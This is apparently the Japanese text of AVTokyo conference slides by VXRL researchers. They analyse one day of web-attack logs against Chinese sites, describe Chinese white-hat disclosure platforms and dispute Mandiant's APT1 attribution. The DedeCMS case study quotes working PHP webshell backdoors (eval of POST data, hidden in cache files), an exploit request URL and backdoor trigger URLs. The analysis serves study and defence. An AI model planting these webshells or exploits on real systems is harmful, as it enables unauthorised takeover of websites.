China is a victim, too :) (AVTokyo Special Edition)

Darkfloyd x Zetta, VXRL

免責条項

　我々は、中国や香港の政府で

働いているわけではなく、支援やお金ももらってません。

目的

● いつも中国は積極的な攻撃者側であるとされているが、解析を通じて別の側面が見えてきた :− Part1:中国の様々なWebサイトに対する攻撃を解析したある一日

− Part2:中国ではソフトやサイトの脆弱性はどのように公開されているか知っていますか？

● 報道はいつも中国のブラックハット側ばかりを扱うが、ホワイトハットはどうなってるの？

− Part3:APT1レポートへの反論 (Ran2より )

Part 1:中国の様々なWebサイトに対する攻撃を解析したある一日

研究と解析

● 北京の Knownsecのクラウドベースのアプリケーション FWからキャプチャした攻撃のログ /データと VXRLで解析をした結果を共有している。

● 我々は 11月 11日を解析した。この日は中国本土でオンラインショッピング /電子商取引の割引が行われる日 (Single's Day,光棍節 ) 。

● 我々は攻撃の重要度やインパクトを考慮して被害者の IPやドメイン名は公開しない。

Single's Day, 光棍節とは ?

Single's Day, 光棍節とは ?

Single’s Dayは米国でいえばサイバーマンデー

http://en.wikipedia.org/wiki/Singles_Day

研究と解析

● 我々は何を観察して解析をしたいのか？

− 割合分布：海外からの攻撃 vs国内からの攻撃

− 主な被害者はどんな攻撃を受けている？

− 優秀な攻撃者？ どんな攻撃手法を好む？

− どんなシステムやプラットフォームがターゲットになっている？

− その他興味深い攻撃ペイロードは？

11/11の攻撃トラフィック vsペイロード

攻撃トラフィック（ 1分ごとの合計）

11/11の攻撃トラフィック vsペイロード :夕方から夜

攻撃トラフィック（ 1分ごとの合計、スキャナーのトラフィックを除外）

攻撃タイプの分布Attack Type No. of Request Percentage

SCANNER 59101248 91.3447%

LRFI 218753 0.3381%

FILEI 222774 0.3443%

SPECIAL 35838 0.0554%

WEBSHELL 42463 0.0656%

COLLECTOR 4491625 6.9421%

SQLI 274792 0.4247%

XSS 225796 0.3490%

OS_COMMAND 1022 0.0016%

CODE 86140 0.1331%

OTHERS 887 0.0014%

64701338 100.00%

電子ショッピングの日 (2013/11/11) の攻撃者はどこにいる？解析結果から 97.5 %は「中国国内の IPから」

残り 2.5%は海外からそれらにはスキャナーも含む

スキャナーからの攻撃を除いたらどうでしょうか？

Country AttackChina 1070489US　　　 18588Netherlands 5404Hong Kong 4288Korea 1823Turkey 1429Japan 872

攻撃者トップ 25

24位はアメリカそれ以外はすべて中国

ケーススタディ：中国は被害者であるかないか？！

“いい人ランキング”への投票

Tou.php – “Tou” は “投票” , 中国語で “投”

このサイトへのリクエストデータは 6.5GBにもなる。

事実、我々中国人は「良い行いと、善良な人」に対してポジティブにサポートをする

ただ、実際の投票とロボットによる投票の区別は難しい

我々は、香港から攻撃トラフィックを発見した

Abuse X-Forwarder to fake different IP address to voting from 58.64.X.X

それは私が好きな ISPだった :)

11/11のショッピングの日 (Single’s Day)！

「グループ購入のサイト」へ 47回の古い OSコマンドの攻撃通信を見つけた

海外からの攻撃はどうだろう？

どこから？Country IPChina 116.252.224.162US 173.208.240.190Korea 119.70.29.137Hong Kong 58.64.205.27Thailand 110.34.230.226Taiwan 118.233.66.105Japan 202.89.232.79

観察：海外からの興味深い攻撃はあるか？アメリカから？！中国の Pythonレイヤー 7の DDosスクリプト？！（ 0:00-2359）

観察：中国のツールがアメリカの IPアドレスから :)http://www.dklkt.cn/article.asp?id=233

アメリカからの攻撃はあるか？

アメリカからの攻撃はあるか？

• 最近は CMSの脆弱性に関するスキャンと探索• 詳細はのちほど紹介• CMSとフォーラムが標的

日本からの攻撃はあるか？

日本からの攻撃はあるか？

特別なものはない、単純なダウンロード、スキャナーからの通信興味深いのは中国のスキャンサービスwebscan.360.cn は日本の IPアドレスを使用している。

韓国からの攻撃はあるか？

こちらも特別なものはない、単純なダウンロード、スキャナーからの通信315online.com.cn はアンチオンライン詐欺のポータルサイト

台湾やタイからの攻撃はあるか？

典型的なスキャナーの通信、特別なものは無い

オランダからの攻撃はあるか？

中国のWordpressに似たサイトへのスキャン

観察：被害者送られた特別なペイロード

● <URL>/plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B

● DedecmsにWebshellバックドアを作成

● Dedecmsの脆弱性を使って多くの攻撃を受けているhttp://www.wooyun.org/searchbug.php?q=dedecms

Dedecms (中国製 CMS)

DedeCMS

参考 : DedeCMS Exploit Interesting technique to hid the webshell: put it like a cache file.http://www.nxadmin.com/penetration/1168.html http://blog.csdn.net/seoyundu/article/details/12855759

/plus/download.php exploit - Inject Webshellhttp://www.xiaosedi.com/post/dedecms_exp_01.html

/plus/search.php exploit - Inject Webshellhttp://eoo.hk/oswork/28.htm

DedeCMS backdoor killer from Anquan.orghttp://edu.cnw.com.cn/edu-security/netsec/websec/htm2013/20130807_278959.shtml

ログに 90sec.php を見つけて、 .inc ファイルに以下のステートメントがあった :{dede:php}file_put_contents(’90sec.php’,'<?php eval($_POST[guige]);?>’);{/dede:php}でも、そんなフォルダーは見つからないなぜ？data/cache フォルダー配下に、以下のコードを含む複数の htm (myad-1.htm,myad-16.htm,mytag-1208.htm) ファイルが見つかった :<!–document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”);–><!–document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);–><!–document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST['guige'],’error’);?>”);–>

おかしい、 .htmページが webshellとして機能している。そして .htmファイルが他の phpファイルを includeしている。チェックをしたら /mytag_js.php が追加されていた

スキャナーに検出されることなく、様々な IDを渡しながら、以下の URLで webshellバックドアをトリガーする :

http://www.nxadmin.com/plus/mytag_js.php?id=1208

http://www.nxadmin.com/plus/ad_js.php?id=1

参考 :http://www.nxadmin.com/penetration/1168.html

Part 2: 中国のホワイトハット組織

中国のホワイトハットWooyun: 中国でバグを公表

● コンセプトはMiterの CVEに似てるが、より有益で組織化されている

● ベンダーに対して中立

● 一般に公開している

● ホワイトハットコミュニティを支援している (http://www.wooyun.org/whitehats/)

観察 #1: CMSのバグはいたるところにある

http://www.wooyun.org/bug.php?action=list&subtype=52

(以下はグーグル翻訳結果、実際は中国語 )

観察 #2: ホワイトハットが脆弱性を報告しても…

● ホワイトハットが 360に対して高リスクの脆弱性を報告したが、 360は「無視する !」と言った

● ファック！（ -_-）凸

かたくなに無視されている高～中レベルの脆弱性 (黄色で強調 )

http://www.wooyun.org/corps/%E5%A5%87%E8%99%8E360

観察 #3: ベンダーからの報奨金とホワイトハットの促進

Zoomeye (www.zoomeye.org)

中国のホワイトハット : Anquan.org (様々なソフトウェアやセキュリティ製品ベンダーの間でのセキュア同盟 )

● 800のベンダー● ベンダーに対して中立

● どんな違反行為、プライバシー侵害、フィッシングアタック等に対しても報告できる公共のプラットフォーム

● http://www.anquan.org/help/aboutus/authen/

まだ時間があるなら、、、Part 3: APT1レポート - VXRLの Ran2からの反論

APT1レポート : 反論

● Mandiantの APT1レポートを読んだ人いる？● VXRLの研究者、 Ran2がレポートを分析した。

● Mandiantは、中国人民解放軍 61389部隊から米国への攻撃があったと推測 :− 攻撃者のパスワード

− フォーラムの投稿

　から攻撃者をプロファイリング

Mandiantの APT1レポート

● 2013年 2月 18日に、 Mandiantは前例のない報告書を発表した。

● "APT1: 中国のサイバースパイユニットの一つに関する暴露 "

● Mandiantは、人民解放軍（ PLA）の 61398部隊と、 APT攻撃グループ APT1（別名コメントクルー）とを結ぶ証拠を発見したと主張

Mandiantの APT1レポート

● 中国当局は、Mandiantが非難している APTの活動へのつながりを全面的に否定している。

● 数名の論評家曰く： "Mandiantは明らかにBeijing（北京）の犯行現場を抑えている "

● しかし、懐疑論者曰く： "Mandiantによって証拠が中国または PLAに向けられるようにでっち上げられている。結論に説得力のあるハッキングの証拠が含まれていなかった "

事実の解明 #1: 攻撃者のプロファイリング

● 「 APT1はデジタルマシンの中の幽霊ではない」とMandinatは主張する。MandinatはAPT1のペルソナの数を特定した。 APT1レポートの 51ページでは、 APT1のペルソナを特定したデータマイニングによるプロファイリングの方法についてのヒントが示されている。

− APT1のデジタル兵器の作者 (つまり、マルウェアの作者 )

− APT1の FQDNの登録者 (別名 FQDNプロファイリング )

− 電子メールアカウント (ソーシャルウェブサイトで使われた )

− 漏洩した Rootkit.comアカウントの登録記録

事実の解明 #1: 攻撃者のプロファイリング

● プロファイリングの結果に基づき、上海を拠点にし、マルウェアの作者と連絡を取る義務があり、 APT1攻撃の準備および実行した 3つのペルソナは PLAのために働いているとMandiantはと信じていた。

● UglyGorilla（ UG）は、上記の結論につながる特定された主要なペルソナである。

事実の解明 #1: 攻撃者のプロファイリング

● さらにインターネット上で検索し、私もまた中国の軍事フォーラムで Jack Wangの投稿を発見した。 UglyGorillaもしくは Jack Wangが、実際に 15のメッセージを投稿したことを私は発見したが、サイバー戦争に関連する投稿はたったの 2つしかなかった。その他のトピックは通常の戦争やバイオ化学兵器の話題であった。彼は軍事戦争の愛好家としてフォーラムに投稿していたが、彼自身が兵士であると言及していなかった。私はこの情報も APT1レポートの中で開示されるべきだと思う。

事実の解明 #1: 攻撃者のプロファイリング

● UglyGorillaが APT1マルウェアの作成者であるJack WangまたはWang Dongであることを証明する高い可能性を持っているにもかかわらず、私は彼が中国兵または PLAの 61398部隊にサービスを提供している証拠を見つけていません。私は見つけることができる唯一のつながりは中国の軍事フォーラムでの彼の投稿ですが、自分がただの軍事愛好家と述べただけだった。

事実の解明 #1: 攻撃者のプロファイリング

● UglyGorillaと同様に、 APT1レポートに記されたもう一つのペルソナ、 DOTAを特定しました。キャプチャされたビデオより、 DOTAはメールアカウントを登録するため一度だけ使用され、監視対象の踏み台への RDP接続によって得た情報だと私は考えています。

事実の解明 #1: 攻撃者のプロファイリング

● DOTAは上海の電話を使用していたし、他の関係者と通信するとき、彼は英語に堪能であることが明確に証明されている。私は、 DOTAが「 2j3c1k」（二局三处一科）総参謀部第三部第二局を意味するパスワードを使用していると信じている。

● しかし、我々は、他に（二鸡三吃一刻）「 3種類の方法で 2羽の鶏を調理した瞬間」の意味でもあることを否定できない。

事実の解明 #1: 攻撃者のプロファイリング

● はい、それは興味深いですね。中国語を簡単な文字で表す方法はたくさんあります。

● 私は告発するための出口を探そうとしている訳ではありませんが、 APT1が PLAの 61398部隊であることを指し示す確固たる証拠を見たい。

事実の解明 ＃ 2：インフラ、リモートデスクトップセッション

● Mandiantは 4ページで、 1905のうち 1849セッションで「中国語（簡体字） - 米国のキーボード」キーボードレイアウトを使用したと付言している。また、彼らは攻撃者がMicrosoftのOSの中国語版を使用したと考えている。攻撃者がMicrosoftの OSの中国語版を使用しているという理由で、Mandiantは APT1は中国本土にいる人間であると考えている。

事実の解明 ＃ 2：インフラ、リモートデスクトップセッション

● RDPクライアントは RDPサーバ（ここでは、被害者または踏み台）に 4バイトのキーボードのレイアウトを送信することが、マイクロソフトの RDPプロトコル文書から分かった。 RDPサーバにネットワークスニファをインストールすることで、デジタルな証拠を得ることができます。攻撃者が「中国語（簡体字） - USキーボード」を使用した場合、受信者側では、ネットワークパケットから 0x0804という 4バイトの証拠の検出ができます。

APT1レポートへの反論のさらなる詳細は

− http://espionageware.blogspot.hk/

まとめ● 中国のサイトへ対する興味深いペイロードと実践を紹介しました

● 11月 11日の海外から中国へのWeb攻撃 (電子商取引サイトへの大量のアクセス )は、少数派によって行われていました。

● クローラーとスキャナーがトラフィックの大多数を占め、それ以外の大半は SQLインジェクションです。

● 中国では CMSシステムへの攻撃が多発している。

● 中国にはセキュリティコミュニティを支援する Wooyun.org や Anquan.org のような非営利のホワイトハットがいます。

まとめ● 我々は、技術的なより合理的な推論、十分な証明、科学的解析を元にした技術レポートを期待します。

● 中国を単純にサイバー戦争の当事者と関連付けることの無い中立的な立場の分析レポートを望んでいます。

● 中国のセキュリティに対する、より公平なコメントを望んでいます。

● 誤った恐怖感を植えつけることで、製品やソリューションを売りつけることは簡単です。しかし、研究者として高い倫理観と確かな思考を備えておいてください。私たちは研究者であり科学者ですが日和見主義者です

感謝 Thank you so much :)

Zettaと Ran2の仕事、分析、時間に尊敬と感謝

Knownsecの研究目的の攻撃ログの共有に深い感謝

darkfloyd@vxrl.orgozetta@vxrl.orgran2@vxrl.org